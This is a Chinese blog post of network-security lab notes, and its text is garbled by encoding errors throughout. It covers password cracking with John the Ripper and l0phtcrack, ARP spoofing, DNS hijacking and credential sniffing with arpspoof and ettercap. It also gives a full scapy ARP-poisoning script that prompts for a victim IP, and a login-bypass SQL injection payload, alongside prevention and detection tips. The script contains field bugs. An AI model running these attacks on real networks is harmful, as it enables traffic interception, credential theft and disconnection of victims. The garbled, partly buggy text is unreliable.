內(nèi)容展示類網(wǎng)站seo中文意思是
🍅?點擊文末小卡片?,免費獲取網(wǎng)絡(luò)安全全套資料,資料在手,漲薪更快
網(wǎng)絡(luò)安全實驗3
- 前言
- Kali 常用指令
- 工具教程
- ettercap 基本使用
- 一、口令破解
- John the ripper 破解 linux 密碼
- l0phtcrack7 破解 windows 密碼
- John 破解 zip 壓縮包的密碼
- 二、ARP 欺騙、DNS 劫持
- arpspoof 實現(xiàn) ARP 欺騙
- ettercap 進(jìn)行 DNS 劫持
- ettercap 進(jìn)行 ARP 欺騙
- HTTP&HTTPS賬號密碼獲取
- 三、Python 編寫 arpspoof
- 環(huán)境準(zhǔn)備
- ARP 報文結(jié)構(gòu)
- 編寫代碼
- 測試腳本
- 四、SQL注入自己部署的網(wǎng)站
- 環(huán)境準(zhǔn)備:
- SQL 注入簡單了解:
- 開始實戰(zhàn)
- SQL 注入的預(yù)防方法
- 為什么預(yù)編譯語句可以防SQL注入?
- VmVare 問題匯總
- 橋接模式?jīng)]有網(wǎng)
- 安全貼士
- 如何知道自己是否被 ARP欺騙攻擊了?
前言
本人深感網(wǎng)絡(luò)安全實驗有點麻煩,花了一個晚上弄了部分,特此將筆記貢獻(xiàn)造福后人,個人能力有限,還會繼續(xù)更新。。。
匯報題目:15分鐘教你用 Python 寫一個 arpspoof(課件準(zhǔn)備ing,如果弄完后續(xù)補(bǔ)上)
第一次網(wǎng)絡(luò)安全實驗(密碼學(xué))也是我做的,這里先放個自制工具:Java實現(xiàn)密碼學(xué)工具,集成了對稱加密算法DES,AES,IDEA,公開加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA數(shù)字簽名驗證示例。,具體報告有時間上傳一下。。
后續(xù)準(zhǔn)備:將工具教程與實戰(zhàn)模塊分離。。。
Kali 常用指令
切換系統(tǒng)語言:?sudo dpkg-reconfigure locales
獲取 root 權(quán)限:sudo -s
,輸入密碼
查看 ip 地址:ipconfig
查看網(wǎng)關(guān)地址:route -n
查找文件:lication xxx
放大命令行字體:ctrl
?+?shift
?+?+
縮小命令行字體:ctrl
?+?-
恢復(fù)初始:ctrl
?+?0
工具教程
ettercap 基本使用
左上角搜索?ettercap
,選擇?ettercap-graphical
?打開軟件
Ettercap 掃描局域網(wǎng)主機(jī)
進(jìn)入 ettercao 后,選擇網(wǎng)卡 eth0,其他的默認(rèn)即可,然后點擊右上角的勾,進(jìn)入操作的主界面。
(由于安裝kali的版本不同,Ettercap 界面可能有所不同,不過操作都是大同小異的)
Ettercap 掃描局域網(wǎng)主機(jī)
進(jìn)入主操作界面后,點擊右上角的三個小點,選擇?Hosts- >?Hosts list,就會出現(xiàn)一個局域網(wǎng)所有主機(jī)的列表,如果 主機(jī)列表為空 或是 有些局域網(wǎng)里的主機(jī)沒有顯示在列表里,那么就可以對整個局域網(wǎng)進(jìn)行主機(jī)掃描,點擊三個小點 ->?Hosts->?Scan for hosts。掃描完成后主機(jī)列表就會刷新了。
Ettercap 偽造網(wǎng)關(guān)欺騙
主機(jī)列表中,選中?網(wǎng)關(guān)IP?點擊?Add to Target 1,選擇?需要攻擊的目標(biāo)主機(jī)IP?點擊?Add to Target 2。
這一步主要是欺騙被攻擊的目標(biāo)主機(jī),把 網(wǎng)關(guān)的IP地址偽造成 攻擊者 Mac 地址。讓被攻擊的目標(biāo)主機(jī) 把數(shù)據(jù)發(fā)送到 攻擊者的主機(jī)上。
進(jìn)行 ARP 欺騙
完成上面步驟后,接著點擊小地球選擇?ARP poisoning…?會彈出一個提示框讓你選擇,直接勾選第一個選項,點擊OK,最后一步點擊左上角的三角型按鈕進(jìn)行啟動。
ARP 欺騙啟動后,被攻擊的目標(biāo)主機(jī)數(shù)據(jù)請求就會自動發(fā)送到攻擊者的主機(jī)上來。
一、口令破解
加密算法,其實就是用明文密碼和一個叫 salt 的東西通過函數(shù)crypt()
完成加密。而所謂的密碼域密文也是由三部分組成的,即:$id$salt$encrypted
。
id
?為 1 時,采用 md5 進(jìn)行加密;id
?為 5 時,采用 SHA256 進(jìn)行加密;id
?為 6 時,采用 SHA512 進(jìn)行加密;
通過?cat /etc/shadow
?可以觀察到:
John the ripper 破解 linux 密碼
John the ripper 介紹:
- 四種模式:字典模式,簡單模式,增強(qiáng)模式,外掛模式
- Kali Linux 上的 John 隨帶的密碼列表。它位于下面這個路徑:
/usr/share/john/password.lst
john --wordlist=/usr/share/john/password.lst [filename]
john--show ~/file_to crack
把密碼文件拷貝到用戶目錄下:
cp /etc/shadow /home/yu/yusael
- 1.
破解密碼文件:
john --wordlist=/usr/share/john/password.lst
- 1.
查看破解后的密碼文件:
john -show shadow
- 1.
l0phtcrack7 破解 windows 密碼
功能:該工具支持遠(yuǎn)程破解,理論上能破解所有密碼,但對復(fù)雜度比較高的密碼,破解時間很長
使用前提:
- 登錄了需要破解的計算機(jī)
- 知道需要破解的計算機(jī)的一個管理員的賬戶,密碼
選擇?Password Auditing Wizard
:
選擇要破解的密碼的計算機(jī)操作系統(tǒng),這里我們選擇?Unix-like
,點擊?next
:
選擇需要獲得密碼的計算機(jī)是本機(jī)器還是遠(yuǎn)程機(jī)器,我們選擇?the local machine
?本機(jī)
選擇是用登錄的賬戶還是其他管理員賬戶,這里我們選擇第一個:登錄的賬戶
選擇密碼爆破方式,我們選擇第一種快速破解,當(dāng)然,也可以選擇其他類型:
選擇報告方式,默認(rèn)即可:
選擇?Run this job immediately
?立刻執(zhí)行:
點擊?finish
:
破解結(jié)果:成功破解出簡單的密碼 65535,至于復(fù)雜的含有字母的密碼難以破解(快速模式下)。
John 破解 zip 壓縮包的密碼
準(zhǔn)備工具:
- zip壓縮包帶密碼 1個
- kali Linux機(jī)器 1個
操作步驟:
首先創(chuàng)建一個?hello.zip
?壓縮文件,密碼為?123321
,將他放到 Kali Linux 中;
使用?zip2john
?命令爆出 hash 文件:zip2john hello.zip >> passwd.txt
然后使用?john
?命令,計算 hash 文件:john passwd.txt
,成功破解出密碼:123321
。
二、ARP 欺騙、DNS 劫持
arpspoof 實現(xiàn) ARP 欺騙
ARP欺騙:一種中間人攻擊,攻擊者通過毒化受害者的 ARP 緩存,將網(wǎng)關(guān)的 MAC 替換成攻擊者的 MAC ,于是攻擊者的主機(jī)實際上就充當(dāng)了受害主機(jī)的網(wǎng)關(guān),之后攻擊者就可以截獲受害者發(fā)出和接到的數(shù)據(jù)包,從中獲取賬號密碼、銀行卡信息等,也可以實現(xiàn)斷網(wǎng)操作。
注:我們可以通過在終端輸入?
arp -a
?來查詢 ARP 緩存,為了防治 ARP 欺騙,可以通過?arp -s IP MAC
?綁定 IP 和 MAC 生成 靜態(tài) ARP 表項
實驗環(huán)境:
- 虛擬機(jī) A,使用 kali linux(攻擊者)
- 本地主機(jī) B,win10
- A 和 B 處于同一局域網(wǎng),這里的虛擬機(jī)需要以橋接的方式進(jìn)行連接!!!
橋接和 NAT 的區(qū)別
1、橋接和 NAT 都是虛擬機(jī)的一種通訊模式,都需要一塊網(wǎng)卡,但在橋接模式下虛擬機(jī)和主機(jī)在同一網(wǎng)段,而 NAT 模式下虛擬機(jī)和主機(jī)不在同一網(wǎng)段。
2、橋接網(wǎng)絡(luò)相當(dāng)于虛擬機(jī)和主機(jī)接在同一交換機(jī)上,同時上網(wǎng),虛擬機(jī)對物理機(jī)的 CPU 和網(wǎng)絡(luò)的直接影響較小,但安全性較低。
3、NAT 相當(dāng)于虛擬機(jī)通過物理機(jī)連接網(wǎng)絡(luò),此時物理機(jī)相當(dāng)于一個路由器,虛擬機(jī)等同于申請到一個上網(wǎng)名額,對物理機(jī)的 CPU 和網(wǎng)絡(luò)的直接影響較大,但安全性較高。
實驗步驟:
1、主機(jī) B 里?ping www.baidu.com
?檢查網(wǎng)絡(luò)
2、主機(jī) B 里?ipconfig
?查詢主機(jī) B 的 IP 地址
3、在 kali 的終端輸入?route -n
?查詢當(dāng)前局域網(wǎng)網(wǎng)關(guān),為:192.168.3.1
4、arp 攻擊指令格式:arpspoof -i [網(wǎng)卡名稱] -t [B的IP] [當(dāng)前局域網(wǎng)網(wǎng)關(guān)]
;
在 kali 的終端里輸入命令:arpspoof -i eth0 -t 192.168.3.3 192.168.3.1
5、kali 中輸入指令后,回到主機(jī) B,此時已經(jīng)被ARP攻擊,斷網(wǎng)了。
命令行中ping www.baidu.com
?測試網(wǎng)絡(luò)連通發(fā)現(xiàn)請求超時。
ettercap 進(jìn)行 DNS 劫持
ipconfig
?查看 Kali Liunx 的 IP 地址,我這里是?192.168.3.21
;
vi /etc/ettercap/etter.dns
?修改 etter.dns 文件,添加兩行:
* A 192.168.3.21
* PTR 192.168.3.21
- 1.
- 2.
開啟 apache2 服務(wù):
service apache2 start
- 1.
打開?ettercap
:
ettercap -G
- 1.
點擊掃描,掃描到以后,點擊?Add to Target1
、Add to Target2
;
標(biāo)題欄上點擊三個點,選擇?ARP poisoning...
:
選中?Sniff remote connections.
選擇?dns_spoof
,即 DNS 劫持攻擊。
點擊左上角的開始按鈕,此時下面顯示?Starting Unified sniffing...
?便開始攻擊了。
此時目標(biāo)機(jī)就連不上“國際互聯(lián)網(wǎng)”(這里的目標(biāo)機(jī)是我的Kali機(jī)子)。
ettercap 進(jìn)行 ARP 欺騙
Ettercap 掃描局域網(wǎng)主機(jī)
進(jìn)入 ettercao 后,選擇網(wǎng)卡 eth0,其他的默認(rèn)即可,然后點擊右上角的勾,進(jìn)入操作的主界面。
(由于安裝kali的版本不同,Ettercap 界面可能有所不同,不過操作都是大同小異的)
Ettercap 掃描局域網(wǎng)主機(jī)
進(jìn)入主操作界面后,點擊右上角的三個小點,選擇?Hosts- >?Hosts list,就會出現(xiàn)一個局域網(wǎng)所有主機(jī)的列表,如果 主機(jī)列表為空 或是 有些局域網(wǎng)里的主機(jī)沒有顯示在列表里,那么就可以對整個局域網(wǎng)進(jìn)行主機(jī)掃描,點擊三個小點 ->?Hosts->?Scan for hosts。掃描完成后主機(jī)列表就會刷新了。
Ettercap 偽造網(wǎng)關(guān)欺騙
主機(jī)列表中,選中?網(wǎng)關(guān)IP?點擊?Add to Target 1,選擇?需要攻擊的目標(biāo)主機(jī)IP?點擊?Add to Target 2。
這一步主要是欺騙被攻擊的目標(biāo)主機(jī),把 網(wǎng)關(guān)的IP地址偽造成 攻擊者 Mac 地址。讓被攻擊的目標(biāo)主機(jī) 把數(shù)據(jù)發(fā)送到 攻擊者的主機(jī)上。
進(jìn)行 ARP 欺騙
完成上面步驟后,接著點擊小地球選擇?ARP poisoning…?會彈出一個提示框讓你選擇,直接勾選第一個選項,點擊OK,最后一步點擊左上角的三角型按鈕進(jìn)行啟動。
ARP 欺騙啟動后,被攻擊的目標(biāo)主機(jī)數(shù)據(jù)請求就會自動發(fā)送到攻擊者的主機(jī)上來。
此時目標(biāo)主機(jī)已經(jīng)受到攻擊。
通過 路由表 判斷 是否被 ARP 欺騙:ARP -n
HTTP&HTTPS賬號密碼獲取
先開啟端口轉(zhuǎn)發(fā),保證正常上網(wǎng):echo 1 > /proc/sys/net/ipv4/ip_forward
開始欺騙:arpspoof -i eth0 -t 192.168.3.3 192.168.3.1
用 ettercap 抓取登入帳號,密碼:ettercap -Tq -i eth0
修改中間人攻擊的配置文件:vim /etc/ettercap/etter.conf
三、Python 編寫 arpspoof
環(huán)境準(zhǔn)備
虛擬機(jī)的連接方式:
- NAT(網(wǎng)絡(luò)地址轉(zhuǎn)換,虛擬機(jī)可以上網(wǎng),但不能和物理機(jī)通信)-----VMnet8
- host only(主機(jī)模式,虛擬機(jī)之間回可以通信,與物理機(jī)不能通信)-----VMnet1
- bridge?(橋接,答虛擬機(jī)與物理機(jī)在地位上相等,相當(dāng)于與物理機(jī)在同一局域網(wǎng)的物理機(jī))
Kali 如果沒有 pip3 工具,運(yùn)行下面命令安裝 pip3:
apt install python3-pip
- 1.
安裝 scapy 模塊:
pip3 insatall scapy
- 1.
ARP 報文結(jié)構(gòu)
以太網(wǎng)報文數(shù)據(jù):
- 硬件類型:如以太網(wǎng)(0x0001)、分組無線網(wǎng)。
- 協(xié)議類型:如網(wǎng)際協(xié)議(IP)(0x0800)、IPv6(0x86DD)。
- 硬件地址長度:每種硬件地址的字節(jié)長度,一般為6(以太網(wǎng))。
- 協(xié)議地址長度:每種協(xié)議地址的字節(jié)長度,一般為4(IPv4)。
- 操作碼:1 為 ARP 請求,2 為 ARP 應(yīng)答,3為RARP請求,4為RARP應(yīng)答。
- 源硬件地址:n個字節(jié),n由硬件地址長度得到,一般為發(fā)送方MAC地址。
- 源協(xié)議地址:m個字節(jié),m由協(xié)議地址長度得到,一般為發(fā)送方IP地址。
- 目標(biāo)硬件地址:n個字節(jié),n由硬件地址長 度得到,一般為目標(biāo)MAC地址。
- 目標(biāo)協(xié)議地址:m個字節(jié),m由協(xié)議地址長度得到,一般為目標(biāo)IP地址。
報文格式:對我們來說只需要關(guān)心?操作碼
、源硬件地址
、源協(xié)議地址
、目標(biāo)硬件地址
、目標(biāo)協(xié)議地址
CMD中:
from scapy.all import *
# 查看以太網(wǎng)報文
ls(Ether())
# 查看ARP報文
ls(ARP())
編寫代碼
#-*- coding:utf-8 -*-from scapy.all import *
from scapy.layers.l2 import ARP, getmacbyip
import sys'''
arp 緩沖表恢復(fù)
'''
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):print("[*] 恢復(fù)ARP緩沖...")send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_ip), count=5)send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac))'''
進(jìn)行雙向欺騙
'''
def attack_target(gateway_ip, gateway_mac, target_ip, target_mac):'''首先使用 scapy 構(gòu)造 ARP包需要: 了解arp報文結(jié)構(gòu)(見筆記)[以太網(wǎng)的首部]默認(rèn)即可;查看默認(rèn)的以太網(wǎng)頭部:>>> ls(Ether())dst : DestMACField = 'ff:ff:ff:ff:ff:ff' (None)src : SourceMACField = '00:0c:29:07:a4:fd' (None)type : XShortEnumField = 36864 (36864)[arp頭部]默認(rèn)即可;需要了解:操作碼 源硬件地址 源協(xié)議地址 目標(biāo)硬件地址 目標(biāo)協(xié)議地址查看ARP報文:>>> ls(ARP())hwtype : XShortField = 1 (1)ptype : XShortEnumField = 2048 (2048)hwlen : FieldLenField = None (None)plen : FieldLenField = None (None)op : ShortEnumField = 1 (1) hwsrc : MultipleTypeField = '00:0c:29:07:a4:fd' (None)psrc : MultipleTypeField = '192.168.3.21' (None)hwdst : MultipleTypeField = '00:00:00:00:00:00' (None)pdst : MultipleTypeField = '0.0.0.0' (None)我們關(guān)心的是以下幾個屬性:[op]: 操作碼, 默認(rèn)為 11為 ARP請求, 2為 ARP應(yīng)答, 3為 RARP請求, 4為 RARP應(yīng)答RARP —— 逆地址解析協(xié)議, 作用與 ARP 相反, 將 MAC 地址轉(zhuǎn)換為 IP 地址。[hwsrc]: 發(fā)送方 MAC 地址, 用于告訴對方我的 MAC 地址是什么, 默認(rèn)為本機(jī), 可以忽略該屬性hw —— hardware:硬件, src —— source:源, 也就是自己[psrc]: 發(fā)送方 IP 地址, 用于告訴對方我的 IP 地址是什么, 可以用來【偽裝】下面兩個屬性決定報文發(fā)給誰:[hwdst]: 目標(biāo) MAC 地址dst —— destination:目的地[pdst]: 目標(biāo) IP 地址'''# 欺騙目標(biāo)主機(jī), 我是網(wǎng)關(guān)'''發(fā)送給目標(biāo)主機(jī)(target_ip)欺騙它:我的 IP 是 gateway_ip(我是網(wǎng)關(guān))我的 MAC地址 是 hwsrc(默認(rèn)本機(jī))'''poison_target = ARP() # 構(gòu)造 ARP包poison_target.op = 2 # ARP應(yīng)答poison_target.psrc = gateway_ip # 我的 IP 是 gateway_ip(我是網(wǎng)關(guān))poison_target.pdst = target_ip # 目標(biāo) IP 地址poison_target.hwdst = target_mac # 目標(biāo) MAC 地址# 欺騙網(wǎng)關(guān), 我是目標(biāo)主機(jī)'''發(fā)送給網(wǎng)關(guān)(gateway_ip)欺騙它:我的 IP 是 target_ip(我是目標(biāo)主機(jī))我的 MAC地址 是 hwsrc(默認(rèn)本機(jī))'''poison_gateway = ARP() # 構(gòu)造 ARP包poison_gateway.op = 2 # ARP應(yīng)答poison_gateway.psrc = target_ip # 我的 IP 是 target_ip(我是目標(biāo)主機(jī))poison_gateway.pdst = gateway_ip # 目標(biāo) IP地址, 發(fā)送給網(wǎng)關(guān)poison_gateway.hwdst = gateway_ip # 目標(biāo) MAC地址, 發(fā)送給網(wǎng)關(guān)print("[*] 正在進(jìn)行ARP投毒. [CTRL-C 停止]")while True:try:# 不停的發(fā)送 ARP包 send(poison_target)send(poison_gateway)# 休眠一下, 避免太頻繁的欺騙, 影響網(wǎng)絡(luò)time.sleep(2)# 捕獲鍵盤中斷except KeyboardInterrupt:# 進(jìn)行 ARP緩沖修復(fù)restore_target(gateway_ip, gateway_mac, target_ip, target_mac)breakprint("[*] ARP投毒結(jié)束...")def main():# 網(wǎng)卡 (在kali上運(yùn)行該腳本)interface = "eth0"# 網(wǎng)關(guān) gateway_ip = "192.168.3.1"# 目標(biāo)ip# target_ip = "192.168.3.3"target_ip = input("請輸入你想攻擊的IP地址: ")# 設(shè)置網(wǎng)卡conf.iface = interface# 關(guān)閉提示信息conf.verb = 0print("[*] 網(wǎng)卡: %s"%interface )# 獲取網(wǎng)關(guān)MACgateway_mac = getmacbyip(gateway_ip)if gateway_mac is None:print("[!] 獲取網(wǎng)關(guān)MAC失敗. Exiting...")sys.exit(0)else:print("[*] 網(wǎng)關(guān): %s MAC: %s"%(gateway_ip, gateway_mac))# 獲取目標(biāo)主機(jī)MACtarget_mac = getmacbyip(target_ip)if target_mac is None:print("[!] 獲取目標(biāo)主機(jī)MAC失敗. Exiting...")sys.exit(0)else:print("[*] 目標(biāo)主機(jī): %s MAC: %s"%(target_ip, target_mac))attack_target(gateway_ip, gateway_mac, target_ip, target_mac)if __name__ == "__main__":main()
測試腳本
Kali 運(yùn)行腳本,windows 作為靶機(jī)。
查看ip,查看網(wǎng)關(guān)等操作 前面已經(jīng)詳細(xì)列出過,這里不再重復(fù)了,直接開始運(yùn)行腳本,測試。
輸入命令:Python3 arpspoof.py
?運(yùn)行腳本
此時在 windows 上?ping www.baidu.com
:成功斷網(wǎng)了。
四、SQL注入自己部署的網(wǎng)站
環(huán)境準(zhǔn)備:
首先我們在 windows 上部署了自己制作的網(wǎng)站(Spring Boot 搭建),然后開啟了 Tomcat(Java 的 Web 服務(wù)器)。
SQL 注入簡單了解:
主要是針對 SQL 語句的漏洞進(jìn)行攻擊,下面舉一個簡單的例子:
比如網(wǎng)站登錄用戶,基本都是用以下語句去查詢用戶名和密碼,如果正確則登錄成功,否則失敗。
下句中的 SQL 語句的密碼是我隨便寫的,必定是登錄失敗的。
SELECT * FROM t_user WHERE username="zhenyu" AND password='xxxxxx';
- 1.
但是,如果 SQL 語句是下面這樣呢?
SELECT * FROM t_user WHERE username="zhenyu" AND password='xxxxxx' OR 1=1;
- 1.
不法分子可以通過在密碼中拼接SQL中的關(guān)鍵字來達(dá)到登錄的效果,這就是最簡單的SQL注入原理。
但其實 SQL 注入的預(yù)防也是十分容易的,后面會寫到。
開始實戰(zhàn)
首先在 windows 上運(yùn)行 SpringBoot 項目,服務(wù)器開始運(yùn)行。
在 Kali Liunx 上通過 windows 的 IP 訪問我們的網(wǎng)站:
首先確認(rèn)數(shù)據(jù)庫中正確的密碼:
正確的用戶名應(yīng)該是:zhenyu,
正確的密碼應(yīng)該是:123456
輸入用戶名:zhenyu,開始SQL注入:
輸入密碼?12 or ‘1’ = ‘1’
明明密碼不正確,卻可以登錄進(jìn)去!
SQL 注入的預(yù)防方法
其實想要預(yù)防 SQL 注入是非常容易的,尤其是從代碼層面來講,可能只需要改動一行代碼即可。
以下寫法是具有被SQL注入的風(fēng)險的,
只需要改成如下代碼即可,SQL注入就會失效,它的原理是預(yù)編譯語句。
為什么預(yù)編譯語句可以防SQL注入?
預(yù)編譯語句之所以能防止注入,是因為它把單引號轉(zhuǎn)義了,變成了 ',這樣一來,就無法截斷SQL語句,進(jìn)而無法拼接SQL語句 基本上沒有辦法注入了。
關(guān)于預(yù)編譯語句了解即可,大部分的項目開發(fā)中都建議直接使用它,但是很多老項目沒有使用預(yù)編譯語句,就導(dǎo)致了存在SQL注入風(fēng)險的項目依舊很多。
以上演示的是最簡單的SQL注入,黑客們的智慧是無窮的,通過簡單的SQL語句的搭配即可想出SQL注入這樣的攻擊方案,十分令人驚嘆,未來或許還有更多層出不窮的攻擊會出現(xiàn)。
VmVare 問題匯總
橋接模式?jīng)]有網(wǎng)
問題描述:VMWare安裝之后,虛擬網(wǎng)絡(luò)一直使用默認(rèn)配置:即?VMnet0?為?Bridged
?模式,VMnet1?為?Only-Host
?模式,VMnet8?為?NAT
?模式。點擊了虛擬網(wǎng)絡(luò)編輯器(Virtual Network Editor)?恢復(fù)默認(rèn)設(shè)置后,vMnet0 不見了,并且手動添加選擇橋接模式后會報錯:沒有未橋接的主機(jī)網(wǎng)絡(luò)適配器,無法將網(wǎng)絡(luò)更改為橋接狀態(tài)。
此問題導(dǎo)致?VMnet0?無法選擇?bridge
模式,原因是?還原默認(rèn)設(shè)置?按鈕的 卸載組件-安裝組件 過程刪除了橋接服務(wù),使主機(jī)的網(wǎng)絡(luò)網(wǎng)卡沒能被成功識別。
解決方案:
搜索?網(wǎng)絡(luò)狀態(tài),并點擊進(jìn)入
點擊更改適配器選項:
右鍵點擊物理網(wǎng)卡,選擇屬性,比如我這里連接的是WIFi:
檢查是否安裝并選中了 “VMWare Bridge protocol”,如果沒有請繼續(xù)看下去
點擊安裝后,選中服務(wù),點擊添加
然后選擇從磁盤安裝,跳出來一個界面選擇瀏覽,在VMvare根目錄下找到?netbridge.inx
文件
安裝即可。
安裝完畢后,此時物理網(wǎng)卡-屬性中應(yīng)該有 “VMWare Bridge protocol” 選項,打勾即可。
還需要啟動 vmnet bridging 驅(qū)動,管理員打開命令行:net start vmnetbridge
,或者重啟計算機(jī)自動開啟。
安全貼士
如何知道自己是否被 ARP欺騙攻擊了?
在命令行窗口內(nèi)輸入?ARP -a
?查看路由表,如果發(fā)現(xiàn)你的網(wǎng)關(guān)的 Mac 地址,和局域網(wǎng)內(nèi)某臺主機(jī)的 Mac 地址相同,就說明你被欺騙了。
最后感謝每一個認(rèn)真閱讀我文章的人,禮尚往來總是要有的,雖然不是什么很值錢的東西,如果你用得到的話可以直接拿走:
上述所有都有配套的資料,這些資料,對于做【網(wǎng)絡(luò)安全】的朋友來說應(yīng)該是最全面最完整的備戰(zhàn)倉庫,這個倉庫也陪伴我走過了最艱難的路程,希望也能幫助到你!凡事要趁早,特別是技術(shù)行業(yè),一定要提升技術(shù)功底。